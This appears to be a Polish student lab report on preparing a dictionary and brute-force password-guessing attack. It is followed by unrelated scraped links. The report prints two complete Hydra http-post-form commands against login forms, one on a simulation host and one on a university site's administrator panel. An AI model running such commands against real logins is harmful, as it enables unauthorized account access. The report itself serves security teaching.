I1H1S2 Sledzik Lukasz(1)

background image

WOJSKOWA AKADEMIA TECHNICZNA

im. Jarosława Dąbrowskiego

WYDZIAŁ CYBERNETYKI






PRZYGOTOWAĆ atak zdalnego zgadywania hasła (brute force lub

słownikowy)


















Autor:

Kierownik pracy:

Łukasz Śledzik

dr inż. Adam Patkowski




background image

1.

Symulacja ataku na adres

http://symulacja.wcy.wat.edu.pl



Pierwszą czynnością było wybranie aplikacji umożliwiającej przeprowadzenie ataku.

Moim wyborem była aplikacja Hydra, która pozwala przeprowadzić atak zarówno metodą
brute-force jak i metodą z wykorzystaniem słownika. Do sprawdzenia szczegółowych
informacji strony internetowej użyłem przeglądarki Mozilla Firefox z rozszerzeniem Live
HTTP Headers, które umożliwiło odczytanie niektórych informacji niedostępnych w
podglądzie źródła strony. Informacje te zaznaczone są na screenach na czerwono.


Po odczytaniu potrzebnych informacji w programie Hydra zrealizowałem poniższe polecenie:

root@root:~# hydra -L /root/Desktop/Polish.txt -P /root/Desktop/Polish.txt -t 4
symulacja.wcy.wat.edu.pl http-post-form "/form-
73f6590caf26867fc59457d3de7d8a15&form_id:usrname=^USER^&pass=^PASS^&submit=
Zaloguj:Niepoprawna" –vV

Rezultat jest widoczny poniżej:



background image


background image

Na powyższym slajdzie możemy zauważyć, że na krótką chwilę został uruchomiony atak słownikowy
metodą http-post-form z parametrem 4 zadań na cykl. Hydra obsługuje takie metody jak: TELNET,
FTP, HTTP-GET, HTTP-HEAD, HTTPS-GET, HTTP-HEAD, HTTP-PROXY, LDAP2, LADP3,
SMB, SMBNT, MS-SQL, MYSQL, POSTGRES, REXEC, SOCKS5, VNC, POP3, IMAP, NNTP,
PCNFS, ICQ, SAP/R3, Cisco auth, Cisco enable, SMTP-AUTH, SSH2, SNMP, CVS, Cisco AAA.
Jest to doskonałe narzędzie do przeprowadzanie ataków na wiele różnych serwerów i metod
logowania.


2.

Symulacja ataku na adres

http://www.wcy.wat.edu.pl/administrator/


Tak jak w pierwszym przypadku zostały użyte te same narzędzia do pozyskania informacji o

stronie:


Wykonane polecenie:
root@root:~# hydra -L /root/Desktop/Polish.txt -P /root/Desktop/Polish.txt -t 4 www.wcy.wat.edu.pl
http-post-form
"/administrator/index.php:usrname=^USER^&pass=^PASS^&submit=WEJD%AF:Niepoprawna"

background image

Rezultat wykonanego polecenia:


Na slajdzie widzimy atak słownikowy, który został po chwili przerwany. Podejrzewam, że gdyby pozostawić atak aktywny przy odpowiednio
dużym słowniku udało by się uzyskać poprawny login i hasło w obydwu przypadkach ataków.


Wyszukiwarka

Podobne podstrony:
I1H1S2 Sledzik Lukasz(1)
Śledzik Łukasz I1H1S2 Miw(1)
Śledzik Łukasz I1H1S2 Miw(1)
Projekt sprawozdanie Śledzik Łukasz(1)
Sprawozdanie4 Śledzik Łukasz(1)
i1h1s2 Łukasz Śledzik SWP lab2(1)
Spr7 Łukasz Śledzik I1H1S2(1)
I1H1S2 PSBI SledzikLukasz, WAT, SEMESTR IX, psbi, 0zadaniaPSBI-SAiI
Łukasz Okła I1H1S2 lab2(1)
Ćw 03c Izolacja limfocytów ze śledziony oraz określanie żywotności komórek
SLEDZIE w zalewie pomidorowej - pyszne, Inne, KULINARIA
Uraz śledziony, MEDYCYNA, RATOWNICTWO MEDYCZNE, BTLS+chirurgia
Płaty śledziowe w sosie miodowo pomidorowym, przepisy
Zestawienie pow stare, od Łukasza
śledzie na kilka sposobów, Przepisy
giełda chirurgia śledziona
Metody godne Łukaszenki
WYKAZ WSPÓŁRZĘDNYCH po scaleniu i podziale, od Łukasza

więcej podobnych podstron